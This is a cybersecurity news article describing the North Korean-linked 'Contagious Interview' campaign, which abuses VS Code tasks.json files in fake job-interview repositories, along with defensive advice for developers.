Security researchers have recently observed a worrying evolution in the offensive tactics attributed to North Korean-linked actors as part of the campaign known as Contagious Interview : no longer simple fake job interview scams, but full-blown compromise techniques that exploit Microsoft Visual Studio Code , one of the most widely used IDEs for modern developers.
The threat initially presents itself as a harmless contact on professional platforms or a GitHub/GitLab repository to be cloned for a “technical evaluation.” This decoy is part of a broader social engineering operation where attackers pose as recruiters to attract software talent.
The real crux is a technical one: attackers include Visual Studio Code configuration files in the repositories—specifically tasks.json —which, once the project is opened in the IDE and trust in the source is confirmed, are automatically processed and can execute arbitrary commands on the user’s system.
This technique enables malicious payloads to be executed without any visible action from the developer , seamlessly integrating into standard development workflows. Malicious files often contain obfuscated JavaScript and download additional malicious components from remote servers, setting up backdoors and remote control channels.
The scope of the operation is significant, DarkTrace researchers report : the attacks do not only target single devices, but can compromise entire corporate infrastructures thanks to the credentials and privileged access typical of developers, especially in the blockchain, crypto and fintech sectors.
The technique exploited here is not a random bug in Visual Studio Code, but the deliberate abuse of a legitimate feature of the IDE—trusting repositories and automatically configuring tasks—as an attack vector.
The fact that these everyday tools—public Git repositories, widely used code editors, and technical hiring processes—can become sophisticated weapons of compromise highlights the deeper problem: we are inadequately prepared to address threats that integrate social engineering, supply chain, and developer feature abuse .
Defense requires awareness and strict practices: don’t blindly trust external code, carefully review configurations before running them, and use isolated environments or virtual machines to test unknown code . Typically, the first barrier isn’t the system, but the human decision to “trust” the repository.
Ultimately, this type of operation is not just an isolated cyber attack, but a wake-up call for the security of the modern software supply chain , showing how even consolidated tools can become levers for intrusions of international scope.
Follow us on Google News to receive daily updates on cybersecurity. Contact us if you would like to report news, insights or content for publication.
